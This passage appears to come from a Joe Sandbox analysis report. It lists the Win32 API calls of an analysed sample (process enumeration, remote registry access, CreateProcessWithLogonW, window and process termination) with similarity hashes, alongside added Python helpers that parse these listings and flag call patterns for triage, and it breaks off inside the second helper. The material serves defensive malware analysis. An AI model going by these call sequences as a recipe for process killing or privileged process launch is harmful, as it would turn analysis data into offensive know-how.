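    """Map a WSOCK32 ordinal import to its export name when the table knows it."""
    if call.name.startswith("#") and call.module.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(call.name[1:]), call.name)
    return call.name


def parse_listing(text: str) -> List[List[ApiCall]]:
    """Start a new record at each 'APIs' header and parse its call lines."""
    records: List[List[ApiCall]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not records:
            continue  # 'Strings', 'Memory Dump Source', ... are not calls
        args = [a for a in (m.group("args") or "").split(",") if a]
        records[-1].append(ApiCall(m.group("name"), m.group("module"),
                                   args, int(m.group("ref"), 16), m.group("sub")))
    return records


def match_patterns(record: List[ApiCall]) -> List[str]:
    """Names of all patterns whose ordered call sequence this record contains."""
    first_ref: Dict[str, int] = {}
    for call in record:
        if call.subcall_of is None:  # ignore calls attributed to callees
            name = resolve_name(call)
            first_ref[name] = min(first_ref.get(name, call.ref), call.ref)
    hits = []
    for label, seq in PATTERNS.items():
        refs = [first_ref.get(n) for n in seq]
        if None not in refs and all(a < b for a, b in zip(refs, refs[1:])):
            hits.append(label)
    return hits


def triage(text: str) -> Dict[str, List[str]]:
    """Map each flagged record (keyed by its first own ref address) to its hits."""
    out: Dict[str, List[str]] = {}
    for rec in parse_listing(text):
        own = [c for c in rec if c.subcall_of is None]
        hits = match_patterns(rec)
        if own and hits:
            out[f"{own[0].ref:08X}"] = hits
    return out


# Constructed from call lines printed in this report; the first record is a
# progress-bar helper that must not be flagged.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 003CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
  • Part of subcall function 003CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0041A32D
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0041A360
Strings
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00411C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00411C26
• __wsplitpath.LIBCMT ref: 00411C54
• _wcscat.LIBCMT ref: 00411C69
• Process32NextW.KERNEL32(00000000,?), ref: 00411CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00411CF1
APIs
  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004130AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004130EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00413112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0041313B
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0044DC00), ref: 00408E7C
• WSAGetLastError.WSOCK32(00000000), ref: 00408E89
• __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00408EAD
• #16.WSOCK32(?,?,00000000,00000000), ref: 00408EC5
• _strlen.LIBCMT ref: 00408EF7
"""

if __name__ == "__main__":
    for addr, hits in triage(SAMPLE_LISTING).items():
        print(addr, "->", "; ".join(hits))
```

Run against a whole exported report, the parser gives one record per "APIs" header, so a function's own calls can be separated from those the plugin attributes to its subcalls (the CharUpperBuffW line in the registry record, for example, belongs to 00413C06 and is not counted). Requiring increasing ref addresses is a deliberately strict choice: it keeps a record that merely mentions Process32NextW before Process32FirstW from being flagged as a loop, at the cost of missing sequences whose calls are reordered by the compiler.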
APIs
  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
• BeginPaint.USER32(?,?,?), ref: 003CAC2A
• GetWindowRect.USER32(?,?), ref: 003CAC8E
• ScreenToClient.USER32(?,?), ref: 003CACAB
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003CACBC
• EndPaint.USER32(?,?,?,?,?), ref: 003CAD06
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0042E673
Memory Dump Source
• Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
• String ID:
• API String ID: 2592858361-0
• Opcode ID: 5927704361143790ef58eda39bb42a5f882451aa7d5130bca7c702edbfd966c3
• Instruction ID: 9d54d04f749a72ce3fe8f57c8ceb61e08551de2ea271256563fdc2fd5785ad49
• Opcode Fuzzy Hash: 5927704361143790ef58eda39bb42a5f882451aa7d5130bca7c702edbfd966c3
• Instruction Fuzzy Hash: 3941CF705006049FC711DF29DC85FBB7BA8EB59724F04022DF9A9C72A1C335AC85DB66
                                                                                APIs
                                                                                • ShowWindow.USER32(00471628,00000000,00471628,00000000,00000000,00471628,?,0042DC5D,00000000,?,00000000,00000000,00000000,?,0042DAD1,00000004), ref: 0041E40B
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0041E42F
                                                                                • ShowWindow.USER32(00471628,00000000), ref: 0041E48F
                                                                                • ShowWindow.USER32(00000000,00000004), ref: 0041E4A1
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0041E4C5
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0041E4E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: 522820eece423a0947f806f5fd8972e13a35815a722c6d5fe893dea7af72f32d
                                                                                • Instruction ID: c5a189ee7f34ec67dd090749000ddb4c5d474e539ec0ee5e05189c78aa850157
                                                                                • Opcode Fuzzy Hash: 522820eece423a0947f806f5fd8972e13a35815a722c6d5fe893dea7af72f32d
                                                                                • Instruction Fuzzy Hash: B4417238601150EFDB22CF25C599BD57BE1BF05304F1841BAEE598F2A2C735E881CB55
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 003F98D1
                                                                                  • Part of subcall function 003CF4EA: std::exception::exception.LIBCMT ref: 003CF51E
                                                                                  • Part of subcall function 003CF4EA: __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003F9908
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 003F9924
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 003F999E
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003F99B3
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F99D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 2537439066-0
                                                                                • Opcode ID: ee5ced94c186a43eb23204b8fc64d179242bda78fc25efa1c0fe534507dc44b8
                                                                                • Instruction ID: 450cd7a8154dfcb7ec883f8732da767d502ad3dcd7d38ff05117d93996807715
                                                                                • Opcode Fuzzy Hash: ee5ced94c186a43eb23204b8fc64d179242bda78fc25efa1c0fe534507dc44b8
                                                                                • Instruction Fuzzy Hash: C0315E31A00105AFDB11AFA5DC85EABB779FF45710B1580B9F904EB246D770DE14CBA4
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,004077F4,?,?,00000000,00000001), ref: 00409B53
                                                                                  • Part of subcall function 00406544: GetWindowRect.USER32(?,?), ref: 00406557
                                                                                • GetDesktopWindow.USER32 ref: 00409B7D
                                                                                • GetWindowRect.USER32(00000000), ref: 00409B84
                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00409BB6
                                                                                  • Part of subcall function 003F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
                                                                                • GetCursorPos.USER32(?), ref: 00409BE2
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00409C44
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                • String ID:
                                                                                • API String ID: 4137160315-0
                                                                                • Opcode ID: f83afdd6033af10d55ad900135e07c9e05a02270cd43db83a1df48026bfa01b7
                                                                                • Instruction ID: 8be5649888cd8bc81c763d9e535d42ba31d4cf54febbb2db68b38079d9dbb5c5
                                                                                • Opcode Fuzzy Hash: f83afdd6033af10d55ad900135e07c9e05a02270cd43db83a1df48026bfa01b7
                                                                                • Instruction Fuzzy Hash: F931CF72604319ABC710DF14EC49F9BB7E9FF89314F00092AF595E7282DA31EA14CB96
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003EAFAE
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 003EAFB5
                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003EAFC4
                                                                                • CloseHandle.KERNEL32(00000004), ref: 003EAFCF
                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003EAFFE
                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 003EB012
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: 0392fc88f57c1e037e5d74342095f4c3c528254945228c1f6c00b8dcca9e5445
                                                                                • Instruction ID: c7dfb1c25e85a318c4aa211d21cb676ac76f5b95a4f3bfa2c934ea6e48ae398e
                                                                                • Opcode Fuzzy Hash: 0392fc88f57c1e037e5d74342095f4c3c528254945228c1f6c00b8dcca9e5445
                                                                                • Instruction Fuzzy Hash: 3E218B72504259AFCF028FA5ED09FEE7BA9EF44704F144125FE01A21A1C376ED21EB61
                                                                                APIs
                                                                                  • Part of subcall function 003CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003CAFE3
                                                                                  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CAFF2
                                                                                  • Part of subcall function 003CAF83: BeginPath.GDI32(?), ref: 003CB009
                                                                                  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CB033
                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0041EC20
                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 0041EC34
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0041EC42
                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 0041EC52
                                                                                • EndPath.GDI32(00000000), ref: 0041EC62
                                                                                • StrokePath.GDI32(00000000), ref: 0041EC72
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: 4a6a29c401cd67aefe3d3a2064332e86a0dd4506789051087cf7cf0a09022a06
                                                                                • Instruction ID: 9419f81d8cb07481a4c3c67aa8fdb7c5a5a8719a8dd93bb269a5e054a048552d
                                                                                • Opcode Fuzzy Hash: 4a6a29c401cd67aefe3d3a2064332e86a0dd4506789051087cf7cf0a09022a06
                                                                                • Instruction Fuzzy Hash: D611057640014DBFEF069FA4EC88EEA7F6DEB08354F048122BE098A170D7719D95DBA4
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 003EE1C0
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003EE1D1
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003EE1D8
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 003EE1E0
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003EE1F7
                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 003EE209
                                                                                  • Part of subcall function 003E9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,003E9A05,00000000,00000000,?,003E9DDB), ref: 003EA53A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                • String ID:
                                                                                • API String ID: 603618608-0
                                                                                • Opcode ID: e0743c35f53a3bdc85d938cfe649df86e3988d2ecee56608e629e6f09ecb65e3
                                                                                • Instruction ID: 63d4abf93aba5782bf95aef2827c44d8a6c9dd4d02e47e6fd5e974db3abd16bb
                                                                                • Opcode Fuzzy Hash: e0743c35f53a3bdc85d938cfe649df86e3988d2ecee56608e629e6f09ecb65e3
                                                                                • Instruction Fuzzy Hash: D9018FB5E00754BFEB109BA6DC46B5EBFB8EB48751F004066FE08AB2D0D6709C00CBA0
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 003D7B47
                                                                                  • Part of subcall function 003D123A: __initp_misc_winsig.LIBCMT ref: 003D125E
                                                                                  • Part of subcall function 003D123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003D7F51
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003D7F65
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003D7F78
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003D7F8B
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003D7F9E
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003D7FB1
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003D7FC4
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003D7FD7
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003D7FEA
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003D7FFD
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003D8010
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003D8023
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003D8036
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003D8049
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003D805C
                                                                                  • Part of subcall function 003D123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003D806F
                                                                                • __mtinitlocks.LIBCMT ref: 003D7B4C
                                                                                  • Part of subcall function 003D7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0046AC68,00000FA0,?,?,003D7B51,003D5E77,00466C70,00000014), ref: 003D7E41
                                                                                • __mtterm.LIBCMT ref: 003D7B55
                                                                                  • Part of subcall function 003D7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003D7B5A,003D5E77,00466C70,00000014), ref: 003D7D3F
                                                                                  • Part of subcall function 003D7BBD: _free.LIBCMT ref: 003D7D46
                                                                                  • Part of subcall function 003D7BBD: DeleteCriticalSection.KERNEL32(0046AC68,?,?,003D7B5A,003D5E77,00466C70,00000014), ref: 003D7D68
                                                                                • __calloc_crt.LIBCMT ref: 003D7B7A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 003D7BA3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 2942034483-0
                                                                                • Opcode ID: ff935bc532ce764af4a9b1e89f2628bcf4892d2c37aca2cea8bf1b2ed3f1ac65
                                                                                • Instruction ID: 0026194ea31d3a60da3976e87676b6a8665b0a14dce3a416d5c7913df3c1f97c
                                                                                • Opcode Fuzzy Hash: ff935bc532ce764af4a9b1e89f2628bcf4892d2c37aca2cea8bf1b2ed3f1ac65
                                                                                • Instruction Fuzzy Hash: 7DF0903350D7121AEA2777347C0BA4A27849F01730B210AABF8A0DE3D2FF2188414565
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B281D
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 003B2825
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B2830
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B283B
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 003B2843
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B284B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: 7a0184d20929b06917421e3bd00fe2a93da971af9b6fe40f8072a2ca5a35648b
                                                                                • Instruction ID: 029f2fd0c09a79763776559eb390a08328474051015294dacad9f93aeabd1057
                                                                                • Opcode Fuzzy Hash: 7a0184d20929b06917421e3bd00fe2a93da971af9b6fe40f8072a2ca5a35648b
                                                                                • Instruction Fuzzy Hash: D50167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 1423608774-0
                                                                                • Opcode ID: 3284bb93cc385b0c4b1f7d21d56a4d6afbe50f33fab337005f813bad1ff55d49
                                                                                • Instruction ID: b88fdea7e2576009f15d4b0f6509248e4d6eb20e7d747e328df977c55a1518bf
                                                                                • Opcode Fuzzy Hash: 3284bb93cc385b0c4b1f7d21d56a4d6afbe50f33fab337005f813bad1ff55d49
                                                                                • Instruction Fuzzy Hash: F6018132902216ABDB262B64FC48FFB776AFF88701B15147BF603960A0DB649810DB54
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003F7C07
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003F7C1D
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 003F7C2C
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C3B
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C45
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: 97996ec9501e5d19bd889849a873686204e4f60f844c4b24213ab310e957ee97
                                                                                • Instruction ID: 5dbf83bc4a6c476d4fc36166befc980bd9f01ca3545ac053410325407d37f741
                                                                                • Opcode Fuzzy Hash: 97996ec9501e5d19bd889849a873686204e4f60f844c4b24213ab310e957ee97
                                                                                • Instruction Fuzzy Hash: 97F05E72A41158BBE7215B62AC0EEEF7F7CEFC6B11F001028FA12D1091D7A05E41D6B9
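Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python helper that parses the "APIs" lines of listings like the two above (the MapVirtualKeyW block at 003B281D and the PostMessageW / OpenProcess / TerminateProcess block at 003F7C07) and replaces the raw hex the report prints with the Win32 SDK names (WM_CLOSE = 0x0010, SMTO_ABORTIFHUNG = 0x0002, PROCESS_ALL_ACCESS = 0x001F0FFF, VK_LWIN = 0x5B and the other modifier virtual-key codes). It also trims the trailing stack contents Joe Sandbox prints after the real parameters, and flags the close-then-terminate sequence (WM_CLOSE to a window, then OpenProcess with full access followed by TerminateProcess) that the 003F7C07 function shows. The sample lines are copied from this report; the parameter counts and constant tables are SDK values, and reading the sequence as a window-kill routine is my interpretation, not something the report states.

```python
"""Decode the "APIs" lines of a Joe Sandbox function listing.
Added example: not Joe Sandbox code and not code from the analysed sample.
Constant values are the Win32 SDK definitions; sample lines are copied from the report."""
import re
from typing import List, NamedTuple, Optional, Union

Arg = Union[int, str, None]  # hex value, string literal, or None for "?" (unresolved)


class Call(NamedTuple):
    api: str
    module: str
    args: List[Arg]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # set on "Part of subcall function XXXX:" lines


LINE_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Real parameter counts: the report prints stack contents beyond the last
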